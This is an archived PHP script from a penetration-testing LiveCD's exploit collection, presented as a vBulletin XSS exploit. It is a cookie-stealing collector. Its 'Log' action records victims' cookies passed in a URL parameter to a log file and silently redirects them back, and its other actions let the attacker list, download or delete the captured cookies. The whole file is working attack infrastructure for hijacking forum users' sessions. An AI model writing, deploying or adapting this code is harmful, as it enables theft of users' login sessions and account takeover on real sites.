home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / vbulletin / vbulletin-xss.php < prev    next >
Encoding:
PHP Script  |  2005-02-12  |  3.4 KB  |  100 lines
  1. <?PHP
  2.       // vBulletin XSS Injection Vulnerability: Exploit
  3.       // ---
  4.       // Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
  5.       // Descrption: Fetching vBulletin's cookies and storing it into a
  6. log file.
  7.  
  8.       // Variables:
  9.  
  10.       $LogFile = "Cookies.Log";
  11.  
  12.       // Functions:
  13.       /*
  14.       If ($HTTP_GET_VARS['Action'] = "Log") {
  15.           $Header = "<!--";
  16.           $Footer = "--->";
  17.       }
  18.       Else {
  19.  
  20.            $Header = "";
  21.            $Footer = "";
  22.       }
  23.       Print ($Header);
  24.       */
  25.       Print ("<Title>vBulletin XSS Injection Vulnerability:
  26. Exploit</Title>");
  27.       Print ("<Pre>");
  28.       Print ("<Center>");
  29.       Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
  30.       Print ("Coded By: <B><A
  31. Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
  32.       /*
  33.       Print ($Footer);
  34.       */
  35.  
  36.       Switch ($HTTP_GET_VARS['Action']) {
  37.           Case "Log":
  38.  
  39.                  $Data = $HTTP_GET_VARS['Cookie'];
  40.                  $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
  41. (DecHex (MD5 (NULL))))));
  42.                  $Log = FOpen ($LogFile, "a+");
  43.                          FWrite ($Log, Trim ($Data) . "\n");
  44.                          FClose ($Log);
  45.                          Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0;
  46. URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
  47.           Break;
  48.                 Case "List":
  49.                  If (!File_Exists ($LogFile) || !In_Array ($Records)) {
  50.                      Print ("<Br><Br><B>There are No
  51. Records</B></Center></Pre>");
  52.                      Exit ();
  53.                  }
  54.                  Else {
  55.                      Print ("</Center></Pre>");
  56.                      $Records = Array_UniQue (File ($LogFile));
  57.                                   Print ("<Pre>");
  58.                                   Print ("<B>.:: Statics</B>\n");
  59.                      Print ("\n");
  60.                                   Print ("o Logged Records : <B>" . Count
  61. (File ($LogFile)) . "</B>\n");
  62.                      Print ("o Listed Records : <B>" . Count
  63. ($Records) . " </B>[Not Counting Duplicates]\n");
  64.                      Print ("\n");
  65.  
  66.                      Print ("<B>.:: Options</B>\n");
  67.                      Print ("\n");
  68.  
  69.                      If (Count (File ($LogFile)) > 0) {
  70.                          $Link['Download'] = "[<A Href=\"" .
  71. $LogFile . "\">Download</A>]";
  72.                      }
  73.                      Else{
  74.                          $Link['Download'] = "[No Records in Log]";
  75.                      }
  76.  
  77.                      Print ("o Download Log : " . $Link
  78. ['Download'] . "\n");
  79.                      Print ("o Clear Records : [<A Href=\"" .
  80. $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
  81.                      Print ("\n");
  82.                      Print ("<B>.:: Records</B>\n");
  83.                      Print ("\n");
  84.  
  85.                      While (List ($Line[0], $Line[1]) = Each ($Records)) {
  86.                          Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
  87.                      }
  88.                  }
  89.  
  90.                  Print ("</Pre>");
  91.           Break;
  92.           Case "Delete":
  93.               @UnLink ($LogFile);
  94.               Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>")
  95. Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
  96.               Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
  97. $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
  98.           Break;
  99.       }
  100.     ?>